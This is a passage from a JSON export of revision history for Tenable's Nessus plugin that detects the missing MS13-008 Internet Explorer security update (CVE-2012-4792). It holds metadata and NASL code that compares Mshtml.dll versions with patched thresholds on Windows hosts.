audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", 
sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 7}, "differentElements": ["description"], "edition": 10, "lastseen": "2018-11-17T02:55:02"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, 
"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is missing Internet Explorer (IE) Security Update 2799329.\n\nThe installed version of IE is affected by a vulnerability that could allow an attacker to execute arbitrary code on the remote host.", "edition": 4, "enchantments": {"score": {"modified": "2017-10-29T13:35:56", "value": 9.3}}, "hash": "e9e75c9c1cd77ca6e45866bdd60694b2f2516275249358705d283341c07cf983", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "dac4d38422aa1f0e6a7e0a88f95b76df", "key": "sourceData"}, {"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "a6f5bf31886c073e4af45af7488e4877", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1f6b7bf156020139cfba6367866dc123", "key": "references"}, {"hash": "853e90e76cb8bc44659046710a5f8a59", "key": "description"}, {"hash": "72014d26515cb4955665de28c82623a9", "key": "modified"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2017-10-29T13:35:56", "modified": "2017-07-26T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": ["https://technet.microsoft.com/library/security/ms13-008"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n 
script_id(63522);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2017/07/26 20:01:36 $\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_osvdb_id(88774);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\", \"23785\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://technet.microsoft.com/library/security/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2017 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", 
dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", 
version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 6}, "differentElements": ["modified", "sourceData"], "edition": 4, "lastseen": "2017-10-29T13:35:56"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed 
version of IE is affected by a vulnerability that could\nallow an attacker to execute arbitrary code on the remote host.", "edition": 11, "enchantments": {"dependencies": {"modified": "2019-01-16T20:15:18", "references": [{"idList": ["CVE-2012-4792"], "type": "cve"}, {"idList": ["THN:5ACF233F4E37E6A4975B246F2082107C", "THN:7ACF921BA3C582C8760C348FD2475BC2"], "type": "thn"}, {"idList": ["SMB_KB2794220.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:23754", "EDB-ID:23785"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310902699", "OPENVAS:902699"], "type": "openvas"}, {"idList": ["SMNTC-57070"], "type": "symantec"}, {"idList": ["THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "THREATPOST:B4DB3D0667E712349DDF7EF229F2D543", "THREATPOST:39F4459D592F1F044F7A11772E4B8ACE", "THREATPOST:37FD3A8A338F59D00D9F7966AFF5067F", "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:E22638A2E1CC5775D0EA1AF91EFFF450"], "type": "threatpost"}, {"idList": ["SECURITYVULNS:VULN:12835"], "type": "securityvulns"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/IE_CBUTTON_UAF"], "type": "metasploit"}, {"idList": ["1337DAY-ID-20069"], "type": "zdt"}, {"idList": ["SSV:60551"], "type": "seebug"}, {"idList": ["PACKETSTORM:119168", "PACKETSTORM:119186"], "type": "packetstorm"}, {"idList": ["VU:154201"], "type": "cert"}, {"idList": ["SAINT:E4225C669F34358E2FC7EE71D604FA0A", "SAINT:DCB95B394157102378C2A8CADFE280E8", "SAINT:2EF245955FDA0606FF9A743D9132C6A8"], "type": "saint"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "e552b3ba48a2f156c16fa619b4243077722ad304c072a76a9fc6846aca5d2ede", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "6f08f84e3b368ff5e99adc78c0a77eab", "key": "references"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "538d0d1c332ac3dd3e1d9aa41bec0d37", "key": "description"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, 
{"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "015cb78ce50d3bd4e2fbe18f25603329", "key": "modified"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, {"hash": "a6f5bf31886c073e4af45af7488e4877", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "61dcfa1ba98bb298fd5d06d3d95c176e", "key": "sourceData"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2019-01-16T20:15:18", "modified": "2018-11-15T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": ["https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.16\");\n script_cvs_date(\"Date: 2018/11/15 20:50:31\");\n\n script_cve_id(\"CVE-2012-4792\");\n script_bugtraq_id(57070);\n script_xref(name:\"CERT\", value:\"154201\");\n script_xref(name:\"EDB-ID\", value:\"23754\");\n script_xref(name:\"MSFT\", value:\"MS13-008\");\n script_xref(name:\"MSKB\", value:\"2799329\");\n\n script_name(english:\"MS13-008: Security Update for Internet Explorer (2799329)\");\n script_summary(english:\"Checks version of Mshtml.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a code execution vulnerability.\");\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The remote host is missing Internet Explorer (IE) Security Update\n2799329.\n\nThe installed version of IE is affected by a vulnerability that could\nallow an 
attacker to execute arbitrary code on the remote host.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2013/ms13-008\");\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Microsoft has released a set of patches for XP, 2003, Vista, 2008, 7,\n2008 R2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS13-008 Microsoft Internet Explorer CButton Object Use-After-Free Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\nscript_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n 
exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS13-008';\nkb = '2799329';\n\nkbs = make_list(kb);\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'2', win7:'0,1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nrootfile = hotfix_get_systemroot();\nif (!rootfile) exit(1, \"Failed to get the system root.\");\n\nshare = ereg_replace(pattern:\"^([A-Za-z]):.*\", replace:\"\\1$\", string:rootfile);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\n\nif (\n # Windows 7 / 2008 R2\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.22185\", min_version:\"8.0.7601.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"Mshtml.dll\", version:\"8.0.7601.18021\", min_version:\"8.0.7601.17000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.21393\", min_version:\"8.0.7600.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Mshtml.dll\", version:\"8.0.7600.17185\", min_version:\"8.0.7600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Vista / 2008\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, 
file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.6001.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.22995\", min_version:\"7.0.6002.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6002.18747\", min_version:\"7.0.6002.18000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows 2003 / XP 64-bit\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Mshtml.dll\", version:\"6.0.3790.5098\", min_version:\"6.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n\n # Windows XP x86\n #\n # - Internet Explorer 8\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.23462\", min_version:\"8.0.6001.20000\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"8.0.6001.19394\", min_version:\"8.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 7\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.21319\", min_version:\"7.0.6000.20000\", dir:\"\\system32\", 
bulletin:bulletin, kb:kb) ||\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"7.0.6000.17117\", min_version:\"7.0.0.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb) ||\n # - Internet Explorer 6\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"Mshtml.dll\", version:\"6.0.2900.6325\", min_version:\"6.0.2900.0\", dir:\"\\system32\", bulletin:bulletin, kb:kb)\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "title": "MS13-008: Security Update for Internet Explorer (2799329)", "type": "nessus", "viewCount": 7}, "differentElements": ["description"], "edition": 11, "lastseen": "2019-01-16T20:15:18"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:ie"], "cvelist": ["CVE-2012-4792"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The remote host is missing Internet Explorer (IE) Security Update 2799329.\n\nThe installed version of IE is affected by a vulnerability that could allow an attacker to execute arbitrary code on the remote host.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "58899474e5144f974823d0bbe5843c8b0697c2a8faf48e4684a76fba7a51ebca", "hashmap": [{"hash": "ed4584402ef3628bb7394dce3e4ce55d", "key": "published"}, {"hash": "254e47b75e3e4b92eddce6ae2e9b47a4", "key": "cpe"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "3b33040e1ee70c0673ab567f99a67d3f", "key": "modified"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e0495b755cbd4bc646c8cd4fa1af24d6", "key": "title"}, {"hash": "9eac560d661140becf2386e61f0c3aa7", "key": "pluginID"}, {"hash": "432dbc91e05813e6c7c38e4258d2b638", "key": "cvelist"}, {"hash": "c9898bc973bfffca5119f1a3bfa73a8d", "key": "naslFamily"}, 
{"hash": "a6f5bf31886c073e4af45af7488e4877", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "f780f8e2047beaa3cea3360afdd2e9b3", "key": "sourceData"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "1f6b7bf156020139cfba6367866dc123", "key": "references"}, {"hash": "853e90e76cb8bc44659046710a5f8a59", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=63522", "id": "SMB_NT_MS13-008.NASL", "lastseen": "2018-07-31T09:45:12", "modified": "2018-07-30T00:00:00", "naslFamily": "Windows : Microsoft Bulletins", "objectVersion": "1.3", "pluginID": "63522", "published": "2013-01-14T00:00:00", "references": ["https://technet.microsoft.com/library/security/ms13-008"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(63522);\n script_version(\"1.14\");\n 